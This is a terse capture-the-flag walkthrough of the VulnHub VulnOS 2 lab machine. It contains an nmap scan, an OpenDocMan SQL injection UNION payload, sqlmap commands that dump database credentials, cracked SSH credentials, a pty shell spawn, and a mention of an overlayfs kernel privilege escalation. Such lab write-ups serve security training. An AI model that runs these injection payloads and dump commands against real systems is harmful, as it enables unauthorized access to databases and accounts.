VulnOS 2 vulnhub
Machine IP: 192.168.2.8
Nmap
nmap -v -A -sCV 192.168.2.8Nmap scan report for 192.168.2.8
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_ 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
Let’s start enumerating port 80
We can see that hyperlink on the page. We are presented with another website.
The documentation tab gives some information about a new site and its credentials.
Browsing to the above-mentioned folder we reach a new page that gives away the version of the document management system.
Let’s search for OpenDocMan v1.2.7 exploits.
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
we running Sqlmap to exploit and enumerate admin credentials.
sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --dbms=mysql
root@ghost:/home/vijay/vulnhub/vulnosv2# sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --dbms=mysqlavailable databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadminroot@ghost:/home/vijay/vulnhub/vulnosv2# sqlmap -u "http://192.168.2.8/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dump
Let’s try and crack credentials
Username : webmin
Password : webmin1980
Let’s login to the ssh
Now start Privilege Escalation
$ python -c 'import pty;pty.spawn("/bin/bash")'webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
we see the kernel version VulnOSv2 3.13.0–24-generic
google search for “VulnOSv2 3.13.0 exploit” lead to overlayfs local privilege escalation exploit.
we start Python server
python -m SimpleHTTPServer 12
Let’s root the server
Got the flag.txt